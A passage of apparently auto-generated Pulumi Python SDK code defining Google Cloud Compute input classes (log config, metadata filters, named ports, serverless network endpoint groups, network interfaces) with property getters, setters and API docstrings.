Specifies the size of the disk in base-2 GB.
"""
return pulumi.get(self, "disk_size_gb")
@disk_size_gb.setter
def disk_size_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_size_gb", value)
@property
@pulumi.getter(name="diskType")
def disk_type(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the desired disk type on the node. This disk type must be a local storage type (e.g.: local-ssd). Note that for nodeTemplates, this should be the name of the disk type and not its URL.
"""
return pulumi.get(self, "disk_type")
@disk_type.setter
def disk_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_type", value)
@pulumi.input_type
class LogConfigCloudAuditOptionsArgs:
def __init__(__self__, *,
authorization_logging_options: Optional[pulumi.Input['AuthorizationLoggingOptionsArgs']] = None,
log_name: Optional[pulumi.Input['LogConfigCloudAuditOptionsLogName']] = None):
"""
This is deprecated and has no effect. Do not use.
:param pulumi.Input['AuthorizationLoggingOptionsArgs'] authorization_logging_options: This is deprecated and has no effect. Do not use.
:param pulumi.Input['LogConfigCloudAuditOptionsLogName'] log_name: This is deprecated and has no effect. Do not use.
"""
if authorization_logging_options is not None:
pulumi.set(__self__, "authorization_logging_options", authorization_logging_options)
if log_name is not None:
pulumi.set(__self__, "log_name", log_name)
@property
@pulumi.getter(name="authorizationLoggingOptions")
def authorization_logging_options(self) -> Optional[pulumi.Input['AuthorizationLoggingOptionsArgs']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "authorization_logging_options")
@authorization_logging_options.setter
def authorization_logging_options(self, value: Optional[pulumi.Input['AuthorizationLoggingOptionsArgs']]):
pulumi.set(self, "authorization_logging_options", value)
@property
@pulumi.getter(name="logName")
def log_name(self) -> Optional[pulumi.Input['LogConfigCloudAuditOptionsLogName']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "log_name")
@log_name.setter
def log_name(self, value: Optional[pulumi.Input['LogConfigCloudAuditOptionsLogName']]):
pulumi.set(self, "log_name", value)
@pulumi.input_type
class LogConfigCounterOptionsCustomFieldArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
This is deprecated and has no effect. Do not use.
:param pulumi.Input[str] name: This is deprecated and has no effect. Do not use.
:param pulumi.Input[str] value: This is deprecated and has no effect. Do not use.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class LogConfigCounterOptionsArgs:
def __init__(__self__, *,
custom_fields: Optional[pulumi.Input[Sequence[pulumi.Input['LogConfigCounterOptionsCustomFieldArgs']]]] = None,
field: Optional[pulumi.Input[str]] = None,
metric: Optional[pulumi.Input[str]] = None):
"""
This is deprecated and has no effect. Do not use.
:param pulumi.Input[Sequence[pulumi.Input['LogConfigCounterOptionsCustomFieldArgs']]] custom_fields: This is deprecated and has no effect. Do not use.
:param pulumi.Input[str] field: This is deprecated and has no effect. Do not use.
:param pulumi.Input[str] metric: This is deprecated and has no effect. Do not use.
"""
if custom_fields is not None:
pulumi.set(__self__, "custom_fields", custom_fields)
if field is not None:
pulumi.set(__self__, "field", field)
if metric is not None:
pulumi.set(__self__, "metric", metric)
@property
@pulumi.getter(name="customFields")
def custom_fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LogConfigCounterOptionsCustomFieldArgs']]]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "custom_fields")
@custom_fields.setter
def custom_fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LogConfigCounterOptionsCustomFieldArgs']]]]):
pulumi.set(self, "custom_fields", value)
@property
@pulumi.getter
def field(self) -> Optional[pulumi.Input[str]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "field")
@field.setter
def field(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def metric(self) -> Optional[pulumi.Input[str]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "metric")
@metric.setter
def metric(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metric", value)
@pulumi.input_type
class LogConfigDataAccessOptionsArgs:
def __init__(__self__, *,
log_mode: Optional[pulumi.Input['LogConfigDataAccessOptionsLogMode']] = None):
"""
This is deprecated and has no effect. Do not use.
:param pulumi.Input['LogConfigDataAccessOptionsLogMode'] log_mode: This is deprecated and has no effect. Do not use.
"""
if log_mode is not None:
pulumi.set(__self__, "log_mode", log_mode)
@property
@pulumi.getter(name="logMode")
def log_mode(self) -> Optional[pulumi.Input['LogConfigDataAccessOptionsLogMode']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "log_mode")
@log_mode.setter
def log_mode(self, value: Optional[pulumi.Input['LogConfigDataAccessOptionsLogMode']]):
pulumi.set(self, "log_mode", value)
@pulumi.input_type
class LogConfigArgs:
def __init__(__self__, *,
cloud_audit: Optional[pulumi.Input['LogConfigCloudAuditOptionsArgs']] = None,
counter: Optional[pulumi.Input['LogConfigCounterOptionsArgs']] = None,
data_access: Optional[pulumi.Input['LogConfigDataAccessOptionsArgs']] = None):
"""
This is deprecated and has no effect. Do not use.
:param pulumi.Input['LogConfigCloudAuditOptionsArgs'] cloud_audit: This is deprecated and has no effect. Do not use.
:param pulumi.Input['LogConfigCounterOptionsArgs'] counter: This is deprecated and has no effect. Do not use.
:param pulumi.Input['LogConfigDataAccessOptionsArgs'] data_access: This is deprecated and has no effect. Do not use.
"""
if cloud_audit is not None:
pulumi.set(__self__, "cloud_audit", cloud_audit)
if counter is not None:
pulumi.set(__self__, "counter", counter)
if data_access is not None:
pulumi.set(__self__, "data_access", data_access)
@property
@pulumi.getter(name="cloudAudit")
def cloud_audit(self) -> Optional[pulumi.Input['LogConfigCloudAuditOptionsArgs']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "cloud_audit")
@cloud_audit.setter
def cloud_audit(self, value: Optional[pulumi.Input['LogConfigCloudAuditOptionsArgs']]):
pulumi.set(self, "cloud_audit", value)
@property
@pulumi.getter
def counter(self) -> Optional[pulumi.Input['LogConfigCounterOptionsArgs']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "counter")
@counter.setter
def counter(self, value: Optional[pulumi.Input['LogConfigCounterOptionsArgs']]):
pulumi.set(self, "counter", value)
@property
@pulumi.getter(name="dataAccess")
def data_access(self) -> Optional[pulumi.Input['LogConfigDataAccessOptionsArgs']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "data_access")
@data_access.setter
def data_access(self, value: Optional[pulumi.Input['LogConfigDataAccessOptionsArgs']]):
pulumi.set(self, "data_access", value)
@pulumi.input_type
class MetadataFilterLabelMatchArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
MetadataFilter label name value pairs that are expected to match corresponding labels presented as metadata to the load balancer.
:param pulumi.Input[str] name: Name of metadata label. The name can have a maximum length of 1024 characters and must be at least 1 character long.
:param pulumi.Input[str] value: The value of the label must match the specified value. value can have a maximum length of 1024 characters.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of metadata label. The name can have a maximum length of 1024 characters and must be at least 1 character long.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The value of the label must match the specified value. value can have a maximum length of 1024 characters.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class MetadataFilterArgs:
def __init__(__self__, *,
filter_labels: Optional[pulumi.Input[Sequence[pulumi.Input['MetadataFilterLabelMatchArgs']]]] = None,
filter_match_criteria: Optional[pulumi.Input['MetadataFilterFilterMatchCriteria']] = None):
"""
Opaque filter criteria used by load balancers to restrict routing configuration to a limited set of load balancing proxies. Proxies and sidecars involved in load balancing would typically present metadata to the load balancers that need to match criteria specified here. If a match takes place, the relevant configuration is made available to those proxies. For each metadataFilter in this list, if its filterMatchCriteria is set to MATCH_ANY, at least one of the filterLabels must match the corresponding label provided in the metadata. If its filterMatchCriteria is set to MATCH_ALL, then all of its filterLabels must match with corresponding labels provided in the metadata. An example for using metadataFilters would be: if load balancing involves Envoys, they receive routing configuration when values in metadataFilters match values supplied in of their XDS requests to loadbalancers.
:param pulumi.Input[Sequence[pulumi.Input['MetadataFilterLabelMatchArgs']]] filter_labels: The list of label value pairs that must match labels in the provided metadata based on filterMatchCriteria This list must not be empty and can have at the most 64 entries.
:param pulumi.Input['MetadataFilterFilterMatchCriteria'] filter_match_criteria: Specifies how individual filter label matches within the list of filterLabels and contributes toward the overall metadataFilter match. Supported values are: - MATCH_ANY: at least one of the filterLabels must have a matching label in the provided metadata. - MATCH_ALL: all filterLabels must have matching labels in the provided metadata.
"""
if filter_labels is not None:
pulumi.set(__self__, "filter_labels", filter_labels)
if filter_match_criteria is not None:
pulumi.set(__self__, "filter_match_criteria", filter_match_criteria)
@property
@pulumi.getter(name="filterLabels")
def filter_labels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MetadataFilterLabelMatchArgs']]]]:
"""
The list of label value pairs that must match labels in the provided metadata based on filterMatchCriteria This list must not be empty and can have at the most 64 entries.
"""
return pulumi.get(self, "filter_labels")
@filter_labels.setter
def filter_labels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MetadataFilterLabelMatchArgs']]]]):
pulumi.set(self, "filter_labels", value)
@property
@pulumi.getter(name="filterMatchCriteria")
def filter_match_criteria(self) -> Optional[pulumi.Input['MetadataFilterFilterMatchCriteria']]:
"""
Specifies how individual filter label matches within the list of filterLabels and contributes toward the overall metadataFilter match. Supported values are: - MATCH_ANY: at least one of the filterLabels must have a matching label in the provided metadata. - MATCH_ALL: all filterLabels must have matching labels in the provided metadata.
"""
return pulumi.get(self, "filter_match_criteria")
@filter_match_criteria.setter
def filter_match_criteria(self, value: Optional[pulumi.Input['MetadataFilterFilterMatchCriteria']]):
pulumi.set(self, "filter_match_criteria", value)
@pulumi.input_type
class MetadataItemsItemArgs:
def __init__(__self__, *,
key: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
Metadata
:param pulumi.Input[str] key: Key for the metadata entry. Keys must conform to the following regexp: [a-zA-Z0-9-_]+, and be less than 128 bytes in length. This is reflected as part of a URL in the metadata server. Additionally, to avoid ambiguity, keys must not conflict with any other metadata keys for the project.
:param pulumi.Input[str] value: Value for the metadata entry. These are free-form strings, and only have meaning as interpreted by the image running in the instance. The only restriction placed on values is that their size must be less than or equal to 262144 bytes (256 KiB).
"""
if key is not None:
pulumi.set(__self__, "key", key)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Key for the metadata entry. Keys must conform to the following regexp: [a-zA-Z0-9-_]+, and be less than 128 bytes in length. This is reflected as part of a URL in the metadata server. Additionally, to avoid ambiguity, keys must not conflict with any other metadata keys for the project.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
Value for the metadata entry. These are free-form strings, and only have meaning as interpreted by the image running in the instance. The only restriction placed on values is that their size must be less than or equal to 262144 bytes (256 KiB).
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class MetadataArgs:
def __init__(__self__, *,
items: Optional[pulumi.Input[Sequence[pulumi.Input['MetadataItemsItemArgs']]]] = None):
"""
A metadata key/value entry.
:param pulumi.Input[Sequence[pulumi.Input['MetadataItemsItemArgs']]] items: Array of key/value pairs. The total size of all keys and values must be less than 512 KB.
"""
if items is not None:
pulumi.set(__self__, "items", items)
@property
@pulumi.getter
def items(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MetadataItemsItemArgs']]]]:
"""
Array of key/value pairs. The total size of all keys and values must be less than 512 KB.
"""
return pulumi.get(self, "items")
@items.setter
def items(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MetadataItemsItemArgs']]]]):
pulumi.set(self, "items", value)
@pulumi.input_type
class NamedPortArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None):
"""
The named port. For example: <"http", 80>.
:param pulumi.Input[str] name: The name for this named port. The name must be 1-63 characters long, and comply with RFC1035.
:param pulumi.Input[int] port: The port number, which can be a value between 1 and 65535.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if port is not None:
pulumi.set(__self__, "port", port)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name for this named port. The name must be 1-63 characters long, and comply with RFC1035.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port number, which can be a value between 1 and 65535.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@pulumi.input_type
class NetworkEndpointGroupAppEngineArgs:
def __init__(__self__, *,
service: Optional[pulumi.Input[str]] = None,
url_mask: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
Configuration for an App Engine network endpoint group (NEG). The service is optional, may be provided explicitly or in the URL mask. The version is optional and can only be provided explicitly or in the URL mask when service is present. Note: App Engine service must be in the same project and located in the same region as the Serverless NEG.
:param pulumi.Input[str] service: Optional serving service. The service name is case-sensitive and must be 1-63 characters long. Example value: "default", "my-service".
:param pulumi.Input[str] url_mask: A template to parse service and version fields from a request URL. URL mask allows for routing to multiple App Engine services without having to create multiple Network Endpoint Groups and backend services. For example, the request URLs "foo1-dot-appname.appspot.com/v1" and "foo1-dot-appname.appspot.com/v2" can be backed by the same Serverless NEG with URL mask "-dot-appname.appspot.com/". The URL mask will parse them to { service = "foo1", version = "v1" } and { service = "foo1", version = "v2" } respectively.
:param pulumi.Input[str] version: Optional serving version. The version name is case-sensitive and must be 1-100 characters long. Example value: "v1", "v2".
"""
if service is not None:
pulumi.set(__self__, "service", service)
if url_mask is not None:
pulumi.set(__self__, "url_mask", url_mask)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
Optional serving service. The service name is case-sensitive and must be 1-63 characters long. Example value: "default", "my-service".
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="urlMask")
def url_mask(self) -> Optional[pulumi.Input[str]]:
"""
A template to parse service and version fields from a request URL. URL mask allows for routing to multiple App Engine services without having to create multiple Network Endpoint Groups and backend services. For example, the request URLs "foo1-dot-appname.appspot.com/v1" and "foo1-dot-appname.appspot.com/v2" can be backed by the same Serverless NEG with URL mask "-dot-appname.appspot.com/". The URL mask will parse them to { service = "foo1", version = "v1" } and { service = "foo1", version = "v2" } respectively.
"""
return pulumi.get(self, "url_mask")
@url_mask.setter
def url_mask(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_mask", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Optional serving version. The version name is case-sensitive and must be 1-100 characters long. Example value: "v1", "v2".
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class NetworkEndpointGroupCloudFunctionArgs:
def __init__(__self__, *,
function: Optional[pulumi.Input[str]] = None,
url_mask: Optional[pulumi.Input[str]] = None):
"""
Configuration for a Cloud Function network endpoint group (NEG). The function must be provided explicitly or in the URL mask. Note: Cloud Function must be in the same project and located in the same region as the Serverless NEG.
:param pulumi.Input[str] function: A user-defined name of the Cloud Function. The function name is case-sensitive and must be 1-63 characters long. Example value: "func1".
:param pulumi.Input[str] url_mask: A template to parse function field from a request URL. URL mask allows for routing to multiple Cloud Functions without having to create multiple Network Endpoint Groups and backend services. For example, request URLs " mydomain.com/function1" and "mydomain.com/function2" can be backed by the same Serverless NEG with URL mask "/". The URL mask will parse them to { function = "function1" } and { function = "function2" } respectively.
"""
if function is not None:
pulumi.set(__self__, "function", function)
if url_mask is not None:
pulumi.set(__self__, "url_mask", url_mask)
@property
@pulumi.getter
def function(self) -> Optional[pulumi.Input[str]]:
"""
A user-defined name of the Cloud Function. The function name is case-sensitive and must be 1-63 characters long. Example value: "func1".
"""
return pulumi.get(self, "function")
@function.setter
def function(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function", value)
@property
@pulumi.getter(name="urlMask")
def url_mask(self) -> Optional[pulumi.Input[str]]:
"""
A template to parse function field from a request URL. URL mask allows for routing to multiple Cloud Functions without having to create multiple Network Endpoint Groups and backend services. For example, request URLs " mydomain.com/function1" and "mydomain.com/function2" can be backed by the same Serverless NEG with URL mask "/". The URL mask will parse them to { function = "function1" } and { function = "function2" } respectively.
"""
return pulumi.get(self, "url_mask")
@url_mask.setter
def url_mask(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_mask", value)
@pulumi.input_type
class NetworkEndpointGroupCloudRunArgs:
def __init__(__self__, *,
service: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[str]] = None,
url_mask: Optional[pulumi.Input[str]] = None):
"""
Configuration for a Cloud Run network endpoint group (NEG). The service must be provided explicitly or in the URL mask. The tag is optional, may be provided explicitly or in the URL mask. Note: Cloud Run service must be in the same project and located in the same region as the Serverless NEG.
:param pulumi.Input[str] service: Cloud Run service is the main resource of Cloud Run. The service must be 1-63 characters long, and comply with RFC1035. Example value: "run-service".
:param pulumi.Input[str] tag: Optional Cloud Run tag represents the "named-revision" to provide additional fine-grained traffic routing information. The tag must be 1-63 characters long, and comply with RFC1035. Example value: "revision-0010".
:param pulumi.Input[str] url_mask: A template to parse service and tag fields from a request URL. URL mask allows for routing to multiple Run services without having to create multiple network endpoint groups and backend services. For example, request URLs "foo1.domain.com/bar1" and "foo1.domain.com/bar2" can be backed by the same Serverless Network Endpoint Group (NEG) with URL mask ".domain.com/". The URL mask will parse them to { service="bar1", tag="foo1" } and { service="bar2", tag="foo2" } respectively.
"""
if service is not None:
pulumi.set(__self__, "service", service)
if tag is not None:
pulumi.set(__self__, "tag", tag)
if url_mask is not None:
pulumi.set(__self__, "url_mask", url_mask)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
Cloud Run service is the main resource of Cloud Run. The service must be 1-63 characters long, and comply with RFC1035. Example value: "run-service".
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[str]]:
"""
Optional Cloud Run tag represents the "named-revision" to provide additional fine-grained traffic routing information. The tag must be 1-63 characters long, and comply with RFC1035. Example value: "revision-0010".
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag", value)
@property
@pulumi.getter(name="urlMask")
def url_mask(self) -> Optional[pulumi.Input[str]]:
"""
A template to parse service and tag fields from a request URL. URL mask allows for routing to multiple Run services without having to create multiple network endpoint groups and backend services. For example, request URLs "foo1.domain.com/bar1" and "foo1.domain.com/bar2" can be backed by the same Serverless Network Endpoint Group (NEG) with URL mask ".domain.com/". The URL mask will parse them to { service="bar1", tag="foo1" } and { service="bar2", tag="foo2" } respectively.
"""
return pulumi.get(self, "url_mask")
@url_mask.setter
def url_mask(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_mask", value)
@pulumi.input_type
class NetworkEndpointGroupServerlessDeploymentArgs:
def __init__(__self__, *,
platform: Optional[pulumi.Input[str]] = None,
resource: Optional[pulumi.Input[str]] = None,
url_mask: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
Configuration for a serverless network endpoint group (NEG). The platform must be provided. Note: The target backend service must be in the same project and located in the same region as the Serverless NEG.
:param pulumi.Input[str] platform: The platform of the backend target(s) of this NEG. Possible values include: 1. API Gateway: apigateway.googleapis.com 2. App Engine: appengine.googleapis.com 3. Cloud Functions: cloudfunctions.googleapis.com 4. Cloud Run: run.googleapis.com
:param pulumi.Input[str] resource: The user-defined name of the workload/instance. This value must be provided explicitly or in the urlMask. The resource identified by this value is platform-specific and is as follows: 1. API Gateway: The gateway ID 2. App Engine: The service name 3. Cloud Functions: The function name 4. Cloud Run: The service name
:param pulumi.Input[str] url_mask: A template to parse platform-specific fields from a request URL. URL mask allows for routing to multiple resources on the same serverless platform without having to create multiple Network Endpoint Groups and backend resources. The fields parsed by this template are platform-specific and are as follows: 1. API Gateway: The gateway ID 2. App Engine: The service and version 3. Cloud Functions: The function name 4. Cloud Run: The service and tag
:param pulumi.Input[str] version: The optional resource version. The version identified by this value is platform-specific and is follows: 1. API Gateway: Unused 2. App Engine: The service version 3. Cloud Functions: Unused 4. Cloud Run: The service tag
"""
if platform is not None:
pulumi.set(__self__, "platform", platform)
if resource is not None:
pulumi.set(__self__, "resource", resource)
if url_mask is not None:
pulumi.set(__self__, "url_mask", url_mask)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def platform(self) -> Optional[pulumi.Input[str]]:
"""
The platform of the backend target(s) of this NEG. Possible values include: 1. API Gateway: apigateway.googleapis.com 2. App Engine: appengine.googleapis.com 3. Cloud Functions: cloudfunctions.googleapis.com 4. Cloud Run: run.googleapis.com
"""
return pulumi.get(self, "platform")
@platform.setter
def platform(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "platform", value)
@property
@pulumi.getter
def resource(self) -> Optional[pulumi.Input[str]]:
"""
The user-defined name of the workload/instance. This value must be provided explicitly or in the urlMask. The resource identified by this value is platform-specific and is as follows: 1. API Gateway: The gateway ID 2. App Engine: The service name 3. Cloud Functions: The function name 4. Cloud Run: The service name
"""
return pulumi.get(self, "resource")
@resource.setter
def resource(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource", value)
@property
@pulumi.getter(name="urlMask")
def url_mask(self) -> Optional[pulumi.Input[str]]:
"""
A template to parse platform-specific fields from a request URL. URL mask allows for routing to multiple resources on the same serverless platform without having to create multiple Network Endpoint Groups and backend resources. The fields parsed by this template are platform-specific and are as follows: 1. API Gateway: The gateway ID 2. App Engine: The service and version 3. Cloud Functions: The function name 4. Cloud Run: The service and tag
"""
return pulumi.get(self, "url_mask")
@url_mask.setter
def url_mask(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_mask", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
The optional resource version. The version identified by this value is platform-specific and is follows: 1. API Gateway: Unused 2. App Engine: The service version 3. Cloud Functions: Unused 4. Cloud Run: The service tag
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class NetworkInterfaceArgs:
def __init__(__self__, *,
access_configs: Optional[pulumi.Input[Sequence[pulumi.Input['AccessConfigArgs']]]] = None,
alias_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input['AliasIpRangeArgs']]]] = None,
ipv6_access_configs: Optional[pulumi.Input[Sequence[pulumi.Input['AccessConfigArgs']]]] = None,
ipv6_address: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_ip: Optional[pulumi.Input[str]] = None,
nic_type: Optional[pulumi.Input['NetworkInterfaceNicType']] = None,
queue_count: Optional[pulumi.Input[int]] = None,
stack_type: Optional[pulumi.Input['NetworkInterfaceStackType']] = None,
subnetwork: Optional[pulumi.Input[str]] = None):
"""
A network interface resource attached to an instance.
:param pulumi.Input[Sequence[pulumi.Input['AccessConfigArgs']]] access_configs: An array of configurations for this interface. Currently, only one access config, ONE_TO_ONE_NAT, is supported. If there are no accessConfigs specified, then this instance will have no external internet access.
:param pulumi.Input[Sequence[pulumi.Input['AliasIpRangeArgs']]] alias_ip_ranges: An array of alias IP ranges for this network interface. You can only specify this field for network interfaces in VPC networks.
:param pulumi.Input[Sequence[pulumi.Input['AccessConfigArgs']]] ipv6_access_configs: An array of IPv6 access configurations for this interface. Currently, only one IPv6 access config, DIRECT_IPV6, is supported. If there is no ipv6AccessConfig specified, then this instance will have no external IPv6 Internet access.
:param pulumi.Input[str] ipv6_address: An IPv6 internal network address for this network interface.
:param pulumi.Input[str] network: URL of the VPC network resource for this instance. When creating an instance, if neither the network nor the subnetwork is specified, the default network global/networks/default is used. If the selected project doesn't have the default network, you must specify a network or subnet. If the network is not specified but the subnetwork is specified, the network is inferred. If you specify this property, you can specify the network as a full or partial URL. For example, the following are all valid URLs: - https://www.googleapis.com/compute/v1/projects/project/global/networks/ network - projects/project/global/networks/network - global/networks/default
:param pulumi.Input[str] network_ip: An IPv4 internal IP address to assign to the instance for this network interface. If not specified by the user, an unused internal IP is assigned by the system.
:param pulumi.Input['NetworkInterfaceNicType'] nic_type: The type of vNIC to be used on this interface. This may be gVNIC or VirtioNet.
:param pulumi.Input[int] queue_count: The networking queue count that's specified by users for the network interface. Both Rx and Tx queues will be set to this number. It'll be empty if not specified by the users.
:param pulumi.Input['NetworkInterfaceStackType'] stack_type: The stack type for this network interface to identify whether the IPv6 feature is enabled or not. If not specified, IPV4_ONLY will be used. This field can be both set at instance creation and update network interface operations.
:param pulumi.Input[str] subnetwork: The URL of the Subnetwork resource for this instance. If the network resource is in legacy mode, do not specify this field. If the network is in auto subnet mode, specifying the subnetwork is optional. If the network is in custom subnet mode, specifying the subnetwork is required. If you specify this field, you can specify the subnetwork as a full or partial URL. For example, the following are all valid URLs: - https://www.googleapis.com/compute/v1/projects/project/regions/region /subnetworks/subnetwork - regions/region/subnetworks/subnetwork
"""
if access_configs is not None:
pulumi.set(__self__, "access_configs", access_configs)
if alias_ip_ranges is not None:
pulumi.set(__self__, "alias_ip_ranges", alias_ip_ranges)
if ipv6_access_configs is not None:
pulumi.set(__self__, "ipv6_access_configs", ipv6_access_configs)
if ipv6_address is not None:
pulumi.set(__self__, "ipv6_address", ipv6_address)
if network is not None:
pulumi.set(__self__, "network", network)
if network_ip is not None:
pulumi.set(__self__, "network_ip", network_ip)
if nic_type is not None:
pulumi.set(__self__, "nic_type", nic_type)
if queue_count is not None:
pulumi.set(__self__, "queue_count", queue_count)
if stack_type is not None:
pulumi.set(__self__, "stack_type", stack_type)
if subnetwork is not None:
pulumi.set(__self__, "subnetwork", subnetwork)
@property
@pulumi.getter(name="accessConfigs")
def access_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AccessConfigArgs']]]]:
"""
An array of configurations for this interface. Currently, only one access config, ONE_TO_ONE_NAT, is supported. If there are no accessConfigs specified, then this instance will have no external internet access.
"""
return pulumi.get(self, "access_configs")
@access_configs.setter
def access_configs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AccessConfigArgs']]]]):
pulumi.set(self, "access_configs", value)
@property
@pulumi.getter(name="aliasIpRanges")
def alias_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AliasIpRangeArgs']]]]:
"""
An array of alias IP ranges for this network interface. You can only specify this field for network interfaces in VPC networks.
"""
return pulumi.get(self, "alias_ip_ranges")
@alias_ip_ranges.setter
def alias_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AliasIpRangeArgs']]]]):
pulumi.set(self, "alias_ip_ranges", value)
@property
@pulumi.getter(name="ipv6AccessConfigs")
def ipv6_access_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AccessConfigArgs']]]]:
"""
An array of IPv6 access configurations for this interface. Currently, only one IPv6 access config, DIRECT_IPV6, is supported. If there is no ipv6AccessConfig specified, then this instance will have no external IPv6 Internet access.
"""
return pulumi.get(self, "ipv6_access_configs")
@ipv6_access_configs.setter
def ipv6_access_configs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AccessConfigArgs']]]]):
pulumi.set(self, "ipv6_access_configs", value)
@property
@pulumi.getter(name="ipv6Address")
def ipv6_address(self) -> Optional[pulumi.Input[str]]:
"""
An IPv6 internal network address for this network interface.
"""
return pulumi.get(self, "ipv6_address")
@ipv6_address.setter
def ipv6_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ipv6_address", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
URL of the VPC network resource for this instance. When creating an instance, if neither the network nor the subnetwork is specified, the default network global/networks/default is used. If the selected project doesn't have the default network, you must specify a network or subnet. If the network is not specified but the subnetwork is specified, the network is inferred. If you specify this property, you can specify the network as a full or partial URL. For example, the following are all valid URLs: - https://www.googleapis.com/compute/v1/projects/project/global/networks/ network - projects/project/global/networks/network - global/networks/default
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
